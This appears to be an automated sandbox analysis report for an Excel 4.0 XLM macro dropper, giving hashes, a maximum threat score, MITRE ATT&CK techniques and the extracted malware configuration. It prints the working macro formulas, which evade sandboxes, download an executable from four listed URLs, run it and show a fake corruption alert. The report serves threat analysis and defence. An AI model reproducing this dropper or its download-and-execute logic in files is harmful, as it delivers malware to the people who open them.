89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

General

Target

89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c
Size

111KB
Sample

221228-d8w4gscd5x
MD5

c7f273947124d844d77b7c376a9393b4
SHA1

3497bea7fbb12fa3d62fce071fdb22ca53bfbddb
SHA256

89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c
SHA512

b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d
SSDEEP

3072:+0k3hbdlylKsgqopeJBWhZFGkE+cLax9M5QeSqA6JhzmuoVJEm9lKOXm:tk3hbdlylKsgqopeJBWhZFVE+Wax9MM9

Score

10^/10

macro xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

http://icietdemain.fr/contents/2020/02/idle/222222.png

http://careers.sorint.it/idle/33333.png

http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png

Attributes

formulas
=IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =GET.WORKSPACE(13) =GET.WORKSPACE(14) =IF(A2<770,CLOSE(FALSE),) =IF(A3<380,CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","c:\Users\Public\asd2asff32.exe",0,0) =IF(A7<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://icietdemain.fr/contents/2020/02/idle/222222.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A8<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://careers.sorint.it/idle/33333.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A9<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(A12)) =IF(A10<0,CLOSE(FALSE),) =EXEC("c:\Users\Public\asd2asff32.exe") =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2) =CLOSE(FALSE)

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

xlm40.dropper

http://icietdemain.fr/contents/2020/02/idle/222222.png

xlm40.dropper

http://careers.sorint.it/idle/33333.png

xlm40.dropper

http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

Targets

- Target
  
  89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c
- Size
  
  111KB
- MD5
  
  c7f273947124d844d77b7c376a9393b4
- SHA1
  
  3497bea7fbb12fa3d62fce071fdb22ca53bfbddb
- SHA256
  
  89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c
- SHA512
  
  b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d
- SSDEEP
  
  3072:+0k3hbdlylKsgqopeJBWhZFGkE+cLax9M5QeSqA6JhzmuoVJEm9lKOXm:tk3hbdlylKsgqopeJBWhZFVE+Wax9MM9
Score

10^/10
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Process spawned suspicious child process
  This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
behavioral1 behavioral2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Resubmissions

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Targets

Process spawned unexpected child process

Process spawned suspicious child process

MITRE ATT&CK Enterprise v6

Tasks

static1

behavioral1

behavioral2